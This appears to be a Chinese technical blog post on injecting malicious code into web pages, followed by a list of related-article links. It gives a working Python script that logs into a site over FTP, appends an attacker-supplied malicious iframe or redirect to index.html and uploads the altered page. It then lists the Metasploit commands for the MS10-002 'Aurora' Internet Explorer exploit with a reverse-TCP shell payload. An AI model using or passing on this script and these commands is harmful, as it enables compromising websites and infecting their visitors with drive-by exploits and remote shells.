在网页中加入恶意注入代码

最新推荐文章于 2024-04-15 19:05:26 发布
最新推荐文章于 2024-04-15 19:05:26 发布
阅读量2.8k 收藏 2
点赞数 
#!/usr/bin/python
#coding=utf-8
import ftplib

def injectPage(ftp,page,redirect):
	f = open(page + '.tmp','w')
	
	'''
	#ftplib.FTP.retrlines(command[, callback])
	#使用文本传输模式返回在服务器上执行命令的结果。
	#command是指定命令的字符串,通常类似于'RETR filename’.callback是回调函数, 每收到一行数据时都将调用该函数。该回调函数带有一个参数,是包含已收到数据的字符串。如果忽略callback, 则返回的数据将打印到sys.stdout中。
	'''
	ftp.retrlines('RETR ' + page, f.write)  #下载FTP文件
	print '[+] Downloaded Page: ' + page
	f.write(redirect)  #写入文件
	f.close()
	print '[+] Injected Malicious IFrame on: ' + page
	
	'''
	#ftplib.FTP.storlines(command, file)
	#在服务器上执行一个命令并使用文本传输模式传输数据。
	#command是指定低级命令的字符串。它通常是'STOR filename’。file是一个打开的文件对象,将使用file。readline()读取其数据并将该数据发送到服务器。
	'''
	ftp.storlines('STOR ' + page, open(page + '.tmp'))  #上传目标文件
	print '[+] Uploaded Injected Page: ' + page
	print
def main():
	while True:
		host = raw_input('[*]Host >>> ')
		username = raw_input('[*]Username >>> ')
		password = raw_input('[*]Password >>> ')
		redirect = raw_input('[*]Redirect >>> ')
		print
		try:
			ftp = ftplib.FTP(host)
			ftp.login(username,password)
			injectPage(ftp,'index.html',redirect)
		except:
			print '[-] Logon failed.'

if __name__ == '__main__':
	main()

这里主要提及利用之前的极光漏洞,先在Kali中打开Metasploit框架窗口,然后输入命令:

search ms10_002_aurora

use exploit/windows/browser/ms10_002_aurora

show payloads

set payload windows/shell/reverse_tcp

show options

set SRVHOST 10.10.10.160

set URIPATH /exploit

set LHOST 10.10.10.160

set LPORT 443

exploit

运行之后,分别在win 2k3 server和XP上访问http://10.10.10.160:8080/exploit 站点,虽然得到了连接信息但是没有得到shell,可能是因为IE浏览器的版本不存在极光漏洞吧.


zwlww1
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WordPress在自己的网站里添加源代码
本该如此
10-27 1万+
第一步:用WordPress新建页面: 里面可以什么都不写,注意下页面的命名以及固定链接:这里举例为"game01"; 第二步:在网站主目录www下创建文件夹game01: 第三步:把下载的源文件rar/zip解压到game01下: 第四步:把index.html改为index.php        //你也可以在这个文件里加入关于自己网站的东西, 第五步:在自己的网站页...
3-1SQL注入网站实例:注入步骤
小王的储物间
03-20 1678
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
<%%>用法总结
weixin_30251587的博客
09-28 609
代码书写形式上分为四类: <%%>或<%=%><%@%><%#%><%$%> <%%> 或 <%=%> MSDN文章:ASP.NET 网页的嵌入式代码块MSDN位置:开发工具和语言--->Visual Studio 文档--->Visual Web Develope...
代码注入技术
最新发布
Kegi_的博客
04-15 284
代码注入技术是指在程序运行时向程序插入额外的代码,从而改变程序的行为或执行额外的操作。SQL 注入:通过在应用程序与数据库交互时,向输入的 SQL 查询插入恶意代码,从而获取数据库的数据或执行未经授权的操作。Shellcode 注入:通过在应用程序注入恶意的 shellcode,执行系统级代码,控制系统或执行恶意操作。代码注入:将额外的代码插入到应用程序的执行流程,以执行恶意操作,如访问敏感信息、传播恶意软件等。通过以上防范措施,可以有效降低代码注入技术的风险,保护应用程序和系统的安全性。
如何在HTML页面插入javascript代码
weixin_48884617的博客
02-13 3956
如何在HTML页面插入javascript代码? 1.javascript代码可被放置在 HTML 页面的 <head>和 <body>部分。         (1).javascript代码必须写在<script> 标签里面 注意:那些老旧的实例可能会在 <script> 标签使用 type=“text/javascript”。现在已经不必这样做了。JavaScript.
代码注入(web安全入门)
黑战士的博客
12-19 2847
不少知名程序也用到了动态函数的写法,这种写法跟使用 call_user_func() 的初衷一样,用来更加方便的调用函数,但是一旦过滤不严格就会造成代码执行漏洞。call_user_func() 等函数都有调用其他函数的功能,其一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用以外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。我们可以利用 file_get_contents() 函数读取服务器任意文件,前提是知道文件的绝对路径(也可是相对路径)和读取权限。
汇编代码注入器,支持x64和x86
04-04
4. 创建远程线程:使用CreateRemoteThread在目标进程创建一个新线程,使其从注入代码的起始地址开始执行。 三、x64架构的扩展 随着x64架构的普及,传统的x86注入技术需要进行调整。x64架构引入了新的寄存器、...
网页嵌入qq群代码.zip_Q群代加_head_monkeysbk_programav2_网页嵌入代码
09-23
网页嵌入QQ群代码是一种常见的在线社群营销策略,它允许网站管理员在网页直接嵌入QQ群的邀请链接或代码,以便访客可以快速加入到指定的QQ群。这个"网页嵌入qq群代码.zip"压缩包包含了实现这一功能的相关资源,...
SQL注入漏洞演示源代码
12-24
SQL注入是通过在输入数据嵌入恶意SQL语句,欺骗Web应用程序执行非预期的数据库操作。这种攻击方式可能导致数据泄露、数据篡改甚至服务器权限获取。以下是对这个主题的详细解释: 1. **SQL注入的基本概念**:当...
Android获取网页表单的数据实现思路及代码
09-05
5. **JavaScript调用**:在网页的JavaScript代码,当用户提交表单时,我们可以调用`window.testform.send()`方法,将表单数据以特定格式(如"|分隔符")传回给Android。这里的`testform`就是我们在`...
网页js脚本注入,可执行任意代码
11-01
网页js脚本注入,可执行任意代码。这里有个实例教程,通过注入实现跳过验证码。
网站防注入通用代码
12-14
网站防注入通用代码 用于ACCESS、 MS-SQL
HTML注入实现钓鱼
weixin_45006525的博客
08-15 1682
HTML注入实现钓鱼 HTML注入介绍: 超文本标记语言(HTML)注入有时也被称为虚拟污染。 这实际上是一个由站点造成的攻击,该站点允许恶意用户向其 Web 页面注入 HTML,并且没有合理处理用户输入。 换句话说,HTML 注入漏洞是由接收 HTML 引起的,通过一些表单输入后会呈现在页面。 由于 HTML 是用于定义网页结构的语言,如果攻击者可以注入 HTML,它们基本上可以改变浏览器呈现的内容。 有时,这可能会导致页面外观的完全改变,恶意用户会通过注入覆盖掉之前的界面,展现出精心构造的页面,引导用户
程序员疫苗:代码注入
forlong401的专栏--有问题上:http://www.androidren.com
12-10 1830
http://kb.cnblogs.com/page/166279/ 文/陈皓   几个月在我的微博上说过要建一个程序员疫苗网站,希望大家一起来提交一些错误示例的代码,来帮助我们新入行的程序员,不要让我们的程序员一代又一代的再重复地犯一些错误。很多程序上错误就像人类世界的病毒一样,我们应该给我们的新入行的程序员注射一些疫苗,就像给新生儿打疫苗一样,希望程序员从入行时就对这些错误有抵抗力。
web安全之XSS注入漏洞
心寒的博客
01-06 9767
XSS攻击简介 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各...
通过新建浏览器书签的方式给网页注入js代码
weixin_42318668的博客
01-03 2668
通过在浏览器新建标签,点击新建标签的方式执行注入的js代码,可以用于解除网页复制,也可以用于制作一些小脚本去除广告之类的。
【PHP代码注入】PHP代码注入漏洞
cc
03-06 6104
call_user_func()等函数都有调用其他函数的功能,其的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。以call_user_func($fun,$para)函数为例,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,将$para这个参数传递给$fun这个函数去执行。我们可以利用file_get_contents()函数,写入文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件
WEB——XSS注入
yxl_d的博客
07-10 619
前记 XSS攻击 通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 ...
某黑客利用IE浏览器最新的0day漏洞,将恶意代码嵌入正常的Web页面当,用户访问后会自动下载并运行木马程序,这种攻击方式属于? SQL注入 网页挂马 钓鱼攻击 域传送攻击
06-12
某黑客利用IE浏览器最新的0day漏洞,将恶意代码嵌入正常的...在这个例子,黑客利用了IE浏览器的0day漏洞,在正常的Web页面嵌入了恶意代码,当用户访问这个页面时,就会自动下载并运行木马程序,从而实现攻击目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值